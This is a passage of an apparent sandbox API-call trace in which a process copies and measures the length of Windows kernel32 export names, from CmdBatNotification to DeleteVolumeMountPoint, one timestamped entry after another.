lpString1="CmdBatNotification") returned="CmdBatNotification" [0080.078] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0080.078] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0080.078] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0080.078] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0080.078] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0080.078] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0080.078] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0080.078] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0080.078] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0080.078] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0080.078] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0080.078] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0080.078] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0080.079] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0080.079] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0080.079] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0080.079] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0080.079] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0080.079] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0080.079] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0080.079] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0080.079] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0080.079] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0080.079] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0080.079] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0080.079] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0080.079] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0080.079] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0080.079] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0080.079] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0080.079] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0080.079] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0080.079] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0080.079] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0080.079] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0080.079] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0080.079] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0080.079] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0080.079] lstrlenA (lpString="COPYCONTEXT") returned 11 [0080.079] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0080.079] lstrlenA (lpString="COPYFILEA") returned 9 [0080.079] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0080.079] lstrlenA (lpString="COPYFILEEXA") returned 11 [0080.079] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0080.079] lstrlenA (lpString="COPYFILEEXW") returned 11 [0080.079] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0080.079] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0080.079] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0080.079] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0080.079] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0080.079] lstrlenA (lpString="COPYFILEW") returned 9 [0080.080] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0080.080] lstrlenA (lpString="COPYLZFILE") returned 10 [0080.080] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0080.080] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0080.080] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0080.080] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0080.080] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0080.080] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0080.080] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0080.080] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0080.080] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0080.080] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0080.080] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0080.080] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0080.080] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0080.080] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0080.080] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0080.080] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0080.080] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0080.080] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0080.080] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0080.080] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0080.080] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0080.080] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0080.080] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0080.080] lstrlenA (lpString="CREATEEVENTA") returned 12 [0080.080] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0080.080] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0080.080] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0080.080] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0080.080] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0080.080] lstrlenA (lpString="CREATEEVENTW") returned 12 [0080.080] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0080.080] lstrlenA (lpString="CREATEFIBER") returned 11 [0080.080] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0080.080] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0080.080] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0080.081] lstrlenA (lpString="CREATEFILEA") returned 11 [0080.081] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0080.081] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0080.081] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0080.081] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0080.081] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0080.081] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0080.081] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0080.081] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0080.081] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0080.081] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0080.081] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0080.081] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0080.081] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0080.081] lstrlenA (lpString="CREATEFILEW") returned 11 [0080.081] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0080.081] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0080.081] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0080.081] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0080.081] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0080.081] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0080.081] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0080.081] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0080.081] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0080.081] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0080.081] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0080.081] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0080.081] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0080.081] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0080.081] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0080.081] lstrlenA (lpString="CREATEJOBSET") returned 12 [0080.081] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0080.081] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0080.081] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0080.081] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0080.081] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0080.082] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0080.082] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0080.082] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0080.082] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0080.082] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0080.082] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0080.082] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0080.082] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0080.082] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0080.082] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0080.082] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0080.082] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0080.082] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0080.082] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0080.082] lstrlenA (lpString="CREATEPIPE") returned 10 [0080.082] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0080.082] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0080.082] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0080.082] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0080.082] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0080.082] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0080.082] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0080.082] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0080.082] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0080.082] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0080.082] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0080.082] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0080.082] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0080.082] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0080.082] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0080.082] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0080.082] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0080.082] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0080.082] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0080.082] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0080.082] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0080.082] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0080.082] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0080.083] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0080.083] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0080.083] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0080.083] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0080.083] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0080.083] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0080.083] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0080.083] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0080.083] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0080.083] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0080.083] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0080.083] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0080.083] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0080.083] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0080.083] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0080.083] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0080.083] lstrlenA (lpString="CREATETHREAD") returned 12 [0080.083] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0080.083] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0080.083] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0080.083] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0080.083] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0080.083] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0080.083] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0080.083] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0080.083] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0080.083] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0080.083] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0080.083] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0080.083] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0080.083] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0080.083] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0080.083] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0080.083] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0080.083] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0080.083] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0080.083] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0080.083] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0080.084] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0080.084] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0080.084] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0080.084] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0080.084] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0080.084] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0080.084] lstrlenA (lpString="CTRLROUTINE") returned 11 [0080.084] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0080.084] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0080.084] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0080.084] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0080.084] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0080.084] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0080.084] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0080.084] lstrlenA (lpString="DEBUGBREAK") returned 10 [0080.084] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0080.084] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0080.084] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0080.084] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0080.084] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0080.084] lstrlenA (lpString="DECODEPOINTER") returned 13 [0080.084] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0080.084] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0080.084] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0080.084] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0080.084] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0080.084] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0080.084] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0080.084] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0080.084] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0080.084] lstrlenA (lpString="DELETEATOM") returned 10 [0080.084] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0080.084] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0080.084] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0080.084] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0080.084] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0080.084] lstrlenA (lpString="DELETEFIBER") returned 11 [0080.085] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0080.085] lstrlenA (lpString="DELETEFILEA") returned 11 [0080.085] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0080.085] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0080.085] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0080.085] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0080.085] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0080.085] lstrlenA (lpString="DELETEFILEW") returned 11 [0080.085] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0080.085] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0080.085] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0080.085] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0080.085] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0080.085] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0080.085] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0080.085] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0080.085] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0080.085] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0080.085] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0080.085] lstrlenA 